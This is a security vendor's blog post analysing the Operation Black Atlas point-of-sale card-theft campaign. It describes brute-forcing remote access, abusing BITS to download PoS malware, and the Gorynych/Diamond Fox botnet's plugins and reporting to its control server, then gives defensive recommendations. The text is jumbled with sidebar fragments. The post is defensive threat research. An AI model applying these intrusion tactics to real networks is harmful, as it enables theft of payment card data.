**Go to…** **▼** **[Home » Botnets » Operation Black Atlas, Part 2: Tools and Malware Used and How to Detect Them](http://blog.trendmicro.com/trendlabs-security-intelligence/)** **Featured Stories** ## Operation Black Atlas, Part 2: Tools and Malware Used and 2016 Predictions: The Fine Line Between Businessand Personal How to Detect Them **[Pawn Storm Targets MH17 Investigation Team](http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-targets-mh17-investigation-team/)** **[Posted on: December 18, 2015](http://blog.trendmicro.com/trendlabs-security-intelligence/2015/12/)** **at 6:21** **[Posted in: Botnets,](http://blog.trendmicro.com/trendlabs-security-intelligence/category/botnets/)** **[Malware](http://blog.trendmicro.com/trendlabs-security-intelligence/category/malware/)** **am** **Author: Erika Mendoza and Jay Yaneza (Threats** **[FBI, Security Vendors Partner for DRIDEX](http://blog.trendmicro.com/trendlabs-security-intelligence/us-law-enforcement-takedown-dridex-botnet/)** **Takedown** **Analysts)** **Japanese Cybercriminals New Addition To** **13** **40** **Underground Arena** **Follow the Data: Dissecting Data Breaches and** **_This is the second part of our two-part blog series on Operation Black Atlas. The first blog entry is_** **Debunking the Myths** **_entitled, Operation Black Atlas Endangers In-Store Card Payments and SMBs Worldwide;_** **_Switches between BlackPOS and Other Tools._** #### Recent Posts **Operation Black Atlas has already spread to a multi-state healthcare provider, dental clinics, a machine** **manufacturer, a technology company focusing on insurance services, a gas station that has a multi-** **Operation Black Atlas, Part 2: Tools and Malware** **Used and How to Detect Them** **state presence, and a beauty supply shop. It continues to spread across small and medium-sized** **businesses across the globe, using the modular Gorynych/Diamond Fox botnet to exfiltrate stolen data.** **[New Targeted Attack Group Buys BIFROSE Code,](http://blog.trendmicro.com/trendlabs-security-intelligence/new-targeted-attack-group-buys-bifrose-code-works-in-teams/)** **Works in Teams** **[Adobe Flash Player Fixes 79 Bugs; Microsoft Issues](http://blog.trendmicro.com/trendlabs-security-intelligence/adobe-flash-player-fixes-79-bugs-microsoft-issues-12-patches-in-december-patch-tuesday/)** **12 Patches in December Patch Tuesday** **Blog of News Site “The Independent” Hacked,** **Leads to TeslaCrypt Ransomware** **[The German Underground: Buying and Selling](http://blog.trendmicro.com/trendlabs-security-intelligence/the-german-underground-buying-and-selling-goods-via-droppers/)** **Goods via Droppers** #### 2016 Security Predictions **_Figure 1. Operation Black Atlas infection chain_** **_Initial Compromise via Pen Testing Tools_** **The operation uses a variety of penetration testing tools that are available online to probe and** **penetrate their target’s environment. The first set of tools is for scanning and creating a test plan, and** **often uses brute-force or dictionary attacks to break passwords. The second set of tools is for executing** **the plan, and mainly targets remote access services, like the VNC Viewer, the remote desktop protocol** **From new extortion schemes and IoT** **threats to improved cybercrime** **(RDP), and the built-in Windows Remote Desktop Connection (RDC).** **legislation, Trend Micro predicts how the** **security landscape is going to look like in** **All that stands between the organization and the attacker is a weak password. It is harder to determine** **2016.** **lateral movement once user credentials are stolen and used, because the tools used would not be** **[Read more](http://www.trendmicro.com/vinfo/us/security/research-and-analysis/predictions/2016)** **considered malicious. Network defenders must enforce stricter policies on password creation and** **maintenance or deploy password manager software. They can also configure breach detection systems** #### Popular Posts **to log activities like port or vulnerability scanning or brute-force attempts for inspection.** **[Blog of News Site “The Independent” Hacked,](http://blog.trendmicro.com/trendlabs-security-intelligence/blog-of-news-site-the-independent-hacked-leads-to-teslacrypto-ransomware/)** **_BITS and Pieces of POS and Spying Threats_** **Leads to TeslaCrypt Ransomware** **Once the cybercriminals have scoped the network, they will then introduce PoS threats. They do this by** **[High-Profile Mobile Apps At Risk Due to Three-Year-](http://blog.trendmicro.com/trendlabs-security-intelligence/high-profile-mobile-apps-at-risk-due-to-three-year-old-vulnerability/)** **abusing a legitimate function, the Windows Background Intelligent Transfer Service** **Old Vulnerability** **(BITS) or bitsadmin.exe, which can be used to transfer files to and from Microsoft and is typically used** **[Trend Micro, NCA Partnership Leads to Arrests and](http://blog.trendmicro.com/trendlabs-security-intelligence/trend-micro-nca-partnership-lead-to-arrests-and-shutdown-of-refud-me-and-cryptex-reborn/)** **[to download updates to systems. It can easily bypass firewalls and has long been used by malware to](http://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/)** **Shutdown of Refud.me and Cryptex Reborn** **sneak in malicious downloads.** **Cybercriminals Improve Android Malware Stealth** **Routines with OBAD** **In the case of Black Atlas, cybercriminals use BITS to download** **[NewPOSThings, a PoS malware](http://blog.trendmicro.com/trendlabs-security-intelligence/newposthings-has-new-pos-things/)** **family notable for its RAM scraper, keylogger, keep-alive reporting, and data transfer routines. The** **[Hacking Team Flash Zero-Day Integrated Into](http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-flash-zero-day-integrated-into-exploit-kits/)** **[operation can also load a variant of Neutrino or Kasidet which has PoS card-scraping functionality. We](http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/)** **Exploit Kits** **[also saw BlackPOS, CenterPOS, Project Hook, and PwnPOS being used in cases related to the](http://blog.trendmicro.com/trendlabs-security-intelligence/pwnpos-old-undetected-pos-malware-still-causing-havoc/)** **operation. All these PoS threats are available in the cybercriminals’ servers.** **Latest Tweets** **As such, IT administrators should stay up to date on known and latest PoS malware. We have provided** **a complete list of indicators of compromise (IOCs) that can betray the presence of these threats in the** **#PoS systems can be attacked with #PoS** **[skimmers: bit.ly/1NVgYcR](https://t.co/UpRbY6eXph)** ----- **[bit.ly/1QrUzX6](https://t.co/t6BQIC2FeT)** **It's tricky for Law enforcement to keep up** **with North American cybercriminals’ erratic** **[bit.ly/1YNuO4t #DeepWeb](https://t.co/ldur39zSdA)** **Email Subscription** **Your email here** # bb **There s a new player in the card theft game that changes it altogether: Gorynych or the Diamond Fox** **[creative: bit.ly/1QrUzX6](https://t.co/t6BQIC2FeT)** **botnet malware. BKDR_GORYNYCH may not technically be considered a PoS malware, as it is not** **entirely designed for PoS systems and is also being used outside of the Black Atlas operation.** **However, cybercriminals running Black Atlas have built a copy that can specifically look for the output** **file of the BlackPoS malware, which is the one that harvested the credit card data from the targets in** **the first place. The fact that the images in Gorynych’s control panel were named “Kartoxa,” which also** **refers to BlackPoS, further proves the link between the two malware and the operation.** **[about 5 hours ago](http://twitter.com/TrendLabs/status/679043669320720385)** **Aside from the PoS plugin, other modules usually downloaded from a subdirectory in the C&C server** **make up this malware’s entirety. These include plugins for getting screenshots, passwords, mails, and** **It's tricky for Law enforcement to keep up** **more. Without the plugins, Gorynych routines mostly focus on anti-analysis, information theft, and** **with North American cybercriminals’ erratic** **[nature: bit.ly/1YNuO4t #DeepWeb](https://t.co/ldur39zSdA)** **installations. In the Diamond Fox builder, the keylogger and PoS grabber functionalities are disabled** **[about 10 hours ago](http://twitter.com/TrendLabs/status/678968171680940033)** **by default. However, with Operation Black Atlas, these options were turned on, which proves that** **cybercriminals running this are intentionally targeting PoS systems.** #### Stay Updated **Email Subscription** **Your email here** **_Figure 2. Diamond Fox or Gorynych builder_** **After downloading its plugins, Gorynych reports to its server via gate.php using HTTP POST. It uses its** **own user-agent that can be found in its configuration file. The parameters consist of system information** **used to profile the bot, mainly for identification in the Gorynych control panel. The posted information is** **encrypted using a simple XOR operation. Hashes, addresses, and other indicators related to Gorynych** **can be found in the IOC document provided below.** **_Recommendations_** **Every network has its own nuances and patterns. As such, applying a single PoS strategy and hoping** **for the best is out of the question. Our prior research on PoS threats showed us that the best way to** **handle them is by evaluating which best known strategies and defensive technologies can best** **enhance the existing network environment.** **Trend Micro is monitoring this ongoing activity, and will make follow-up reports on this if necessary.** **[Additional technical details can be found in the Technical Brief. The indicators of compromise are](http://documents.trendmicro.com/assets/Operation_Black Atlas_Technical_Brief.pdf)** **[uploaded in the Black Atlas IOC document.](http://documents.trendmicro.com/assets/Operation Black Atlas_Indicators_of_Compromise.pdf)** **Network segmentation and isolation of cardholder data environment from other networks should be** **standard for organizations of all sizes. For large organizations, it is important to eliminate unnecessary** **data and monitor what’s left. It is also best to ensure that essential controls are running via regular** **security checks. IT admins need to monitor and mine event logs.** **Meanwhile, smaller organizations should implement a firewall or ACL on remote access services and** **change default credentials of PoS systems and other internet-facing devices. They should also ensure** **that third party vendors handling the items mentioned have efficiently done them. However, other** **essential controls on passwords and network/system security and monitoring of logs used by larger** **organizations can also be applied. No matter what the size of the organization, what’s important is to** **evaluate your threat landscape to prioritize your treatment strategy.** **To enhance the network’s security posture on point-of-sale systems, IT admins can read about 26** **defensive technologies and strategies outlined in our paper, Defending Against PoS RAM Scrapers:** **Current Strategies and Next-Gen Technologies as well as our write-up on Protecting Point of** **Sales Systems from PoS Malware.** **To stop breaches on point-of-sale systems (or any other PoS environment, for that matter),** **Trend** **Micro™ Custom Defense™ employs a family of solutions that can detect, analyze, and respond to** **[advanced malware and other attack techniques. Endpoint Application Control can reduce attack](http://www.trendmicro.com/us/enterprise/product-security/endpoint-application-control/)** **exposure ensuring that only updates associated with whitelisted applications can be** **installed, helping you safeguard your data and machines against unauthorized access and user error.** ----- ### Related Posts: **Operation Black Atlas Endangers In-Store Card Payments and SMBs Worldwide;** **Switches between BlackPOS and Other Tools** **[One-Man PoS Malware Operation Captures 22,000 Credit Card Details in Brazil](http://blog.trendmicro.com/trendlabs-security-intelligence/fighterpos-fighting-a-new-pos-malware-family/)** **[Looking Back (and Forward) at PoS Malware](http://blog.trendmicro.com/trendlabs-security-intelligence/looking-back-and-forward-at-pos-malware/)** **[Operation Woolen-Goldfish: When Kittens Go Phishing](http://blog.trendmicro.com/trendlabs-security-intelligence/operation-woolen-goldfish-when-kittens-go-phishing/)** **Tags:** **[Targeted Attack](http://blog.trendmicro.com/trendlabs-security-intelligence/tag/targeted-attack/)** **[botnet](http://blog.trendmicro.com/trendlabs-security-intelligence/tag/botnet/)** **[POS](http://blog.trendmicro.com/trendlabs-security-intelligence/tag/pos/)** **[BlackPOS](http://blog.trendmicro.com/trendlabs-security-intelligence/tag/blackpos/)** **[Operation Black Atlas](http://blog.trendmicro.com/trendlabs-security-intelligence/tag/operation-black-atlas/)** **[gorynych](http://blog.trendmicro.com/trendlabs-security-intelligence/tag/gorynych/)** #### 0 Comments TrendLabs 1 Login **Recommend** **Share** **Sort by Best** ### Start the discussion… **ALSO ON TRENDLABS** #### Latest Flash Exploit Used in Pawn Storm Targeted Attacks versus APTs: What’s Circumvents Mitigation Techniques … The Difference?� **2 comments •** **2 months ago** **3 comments •** **3 months ago** **TrendLabs — Yes, EMET 5.x can be** **TrendLabs — Whether or not the Sony** **bypassed. Note though that not every** **attack was an APT is still up for debate. As** **exploit will be implemented to bypass …** **I explained in the entry, APTs are known …** #### Blog of News Site “The Independent” Trend Micro, NCA Partnership Leads to Hacked, Leads to TeslaCrypt … Arrests and Shutdown of Refud.me … **3 comments •** **13 days ago** **16 comments •** **a month ago** **Jérôme Segura — You're welcome. I** **LegitBytes — This is a bunch of Bullshit,** **sincerely hope the 'bad ad' they report is** **worry about Zeus, Betabot and other** **not a way to divert attention and blame …** **Banking Trojans rather than fucking …** **Subscribe** **Add Disqus to your site** **�** **Privacy** **[HOME AND HOME OFFICE](http://www.trendmicro.com/us/home/index.html)** **|** **[FOR BUSINESS](http://www.trendmicro.com/us/business/index.html)** **|** **[SECURITY INTELLIGENCE](http://www.trendmicro.com/us/security-intelligence/index.html)** **|** **[ABOUT TREND MICRO](http://www.trendmicro.com/us/about-us/index.html)** **[Asia Pacific Region (APAC): Australia / New Zealand, 中国, ⽇本, 대한민국](http://www.trendmicro.com.au/au/home/index.html)** **[, 台灣](http://tw.trendmicro.com/tw/home/index.html)** **[Latin America Region (LAR): Brasil, México](http://br.trendmicro.com/br/home/index.html)** **[North America Region (NABU): United States, Canada](http://www.trendmicro.com/us/index.html)** **[Europe, Middle East, & Africa Region (EMEA): France, Deutschland / Österreich / Schweiz, Italia, Россия, España, United Kingdom / Ireland](http://www.trendmicro.fr/)** **[Privacy Statement](http://www.trendmicro.com/us/about-us/legal-policies/privacy-statement/index.html)** **[Legal Policies](http://www.trendmicro.com/us/about-us/legal-policies/index.html)** **Copyright © 2015 Trend Micro Incorporated. All rights reserved.** -----